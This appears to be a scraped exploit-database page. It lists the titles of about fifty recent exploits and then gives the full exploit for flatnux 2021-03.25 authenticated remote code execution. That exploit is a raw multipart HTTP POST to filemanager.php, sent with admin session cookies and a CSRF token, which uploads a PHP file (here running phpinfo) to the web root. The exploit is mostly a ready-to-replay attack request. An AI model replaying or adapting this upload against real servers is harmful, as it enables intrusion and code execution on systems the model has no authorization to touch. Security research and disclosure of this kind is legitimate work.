d7c9ba572a
50 changes to exploits/shellcodes/ghdb Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal and LFI ABUS Security Camera TVIP 20000-21150 - LFI_ RCE and SSH Root Access Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated) Osprey Pump Controller 1.0.1 - (eventFileSelected) Command Injection Osprey Pump Controller 1.0.1 - (pseudonym) Semi-blind Command Injection Osprey Pump Controller 1.0.1 - (userName) Blind Command Injection Osprey Pump Controller 1.0.1 - Administrator Backdoor Access Osprey Pump Controller 1.0.1 - Authentication Bypass Credentials Modification Osprey Pump Controller 1.0.1 - Cross-Site Request Forgery Osprey Pump Controller 1.0.1 - Predictable Session Token / Session Hijack Osprey Pump Controller 1.0.1 - Unauthenticated File Disclosure Osprey Pump Controller 1.0.1 - Unauthenticated Remote Code Execution Exploit Osprey Pump Controller v1.0.1 - Unauthenticated Reflected XSS WIMAX SWC-5100W Firmware V(1.11.0.1 :1.9.9.4) - Authenticated RCE HospitalRun 1.0.0-beta - Local Root Exploit for macOS Adobe Connect 10 - Username Disclosure craftercms 4.x.x - CORS EasyNas 1.1.0 - OS Command Injection Agilebio Lab Collector Electronic Lab Notebook v4.234 - Remote Code Execution (RCE) Art Gallery Management System Project in PHP v 1.0 - SQL injection atrocore 1.5.25 User interaction - Unauthenticated File upload - RCE Auto Dealer Management System 1.0 - Broken Access Control Exploit Auto Dealer Management System v1.0 - SQL Injection Auto Dealer Management System v1.0 - SQL Injection in sell_vehicle.php Auto Dealer Management System v1.0 - SQL Injection on manage_user.php Best pos Management System v1.0 - Remote Code Execution (RCE) on File Upload Best pos Management System v1.0 - SQL Injection ChurchCRM v4.5.3-121fcc1 - SQL Injection Dompdf 1.2.1 - Remote Code Execution (RCE) Employee Task Management System v1.0 - Broken Authentication Employee Task Management System v1.0 - SQL Injection on (task-details.php?task_id=?) Employee Task Management System v1.0 - SQL Injection on edit-task.php flatnux 2021-03.25 - Remote Code Execution (Authenticated) Intern Record System v1.0 - SQL Injection (Unauthenticated) Kimai-1.30.10 - SameSite Cookie-Vulnerability session hijacking LDAP Tool Box Self Service Password v1.5.2 - Account takeover Music Gallery Site v1.0 - Broken Access Control Music Gallery Site v1.0 - SQL Injection on music_list.php Music Gallery Site v1.0 - SQL Injection on page Master.php Music Gallery Site v1.0 - SQL Injection on page view_music_details.php POLR URL 2.3.0 - Shortener Admin Takeover Purchase Order Management-1.0 - Local File Inclusion Simple Food Ordering System v1.0 - Cross-Site Scripting (XSS) Simple Task Managing System v1.0 - SQL Injection (Unauthenticated) modoboa 2.0.4 - Admin TakeOver pdfkit v0.8.7.2 - Command Injection FileZilla Client 3.63.1 - 'TextShaping.dl' DLL Hijacking Windows 11 10.0.22000 - Backup service Privilege Escalation TitanFTP 2.0.1.2102 - Path traversal to Remote Code Execution (RCE) Unified Remote 3.13.0 - Remote Code Execution (RCE)
42 lines
No EOL
1.7 KiB
Text
42 lines
No EOL
1.7 KiB
Text
# Exploit Title: flatnux-2021-03.25 - Remote Code Execution (Authenticated)
|
|
# Exploit Author: Ömer Hasan Durmuş
|
|
# Vendor Homepage: https://en.altervista.org
|
|
# Software Link: http://flatnux.altervista.org/flatnux.html
|
|
# Version: 2021-03.25
|
|
# Tested on: Windows/Linux
|
|
|
|
POST
|
|
/flatnux/filemanager.php?mode=t&filemanager_editor=ckeditor4&dir=misc/media/news&CKEditor=fckeditorsummary_en&CKEditorFuncNum=1&langCode=en
|
|
HTTP/1.1
|
|
Host: localhost
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
|
|
Gecko/20100101 Firefox/109.0
|
|
Accept:
|
|
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
|
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
|
|
Accept-Encoding: gzip, deflate
|
|
Content-Type: multipart/form-data;
|
|
boundary=---------------------------393526031113460918603940283286
|
|
Content-Length: 413
|
|
Origin: http://localhost
|
|
Connection: close
|
|
Referer:
|
|
http://localhost/flatnux/controlcenter.php?page___xdb_news=1&opt=fnc_ccnf_section_news&mod=news&mode=edit&pk___xdb_news=1&desc_=1&order___xdb_news=date&op___xdb_news=insnew
|
|
Cookie: fnuser=admin; secid=fe0d39d41d63bec72eda06bbc7942015; lang=en;
|
|
ckCsrfToken=BFS3h505LnG9r0um2NcRBRbHklciwy5qj0Aw3xsb
|
|
Upgrade-Insecure-Requests: 1
|
|
Sec-Fetch-Dest: iframe
|
|
Sec-Fetch-Mode: navigate
|
|
Sec-Fetch-Site: same-origin
|
|
Sec-Fetch-User: ?1
|
|
|
|
-----------------------------393526031113460918603940283286
|
|
Content-Disposition: form-data; name="upload"; filename="info.php"
|
|
Content-Type: application/octet-stream
|
|
|
|
<?php phpinfo(); ?>
|
|
-----------------------------393526031113460918603940283286
|
|
Content-Disposition: form-data; name="ckCsrfToken"
|
|
|
|
BFS3h505LnG9r0um2NcRBRbHklciwy5qj0Aw3xsb
|
|
-----------------------------393526031113460918603940283286-- |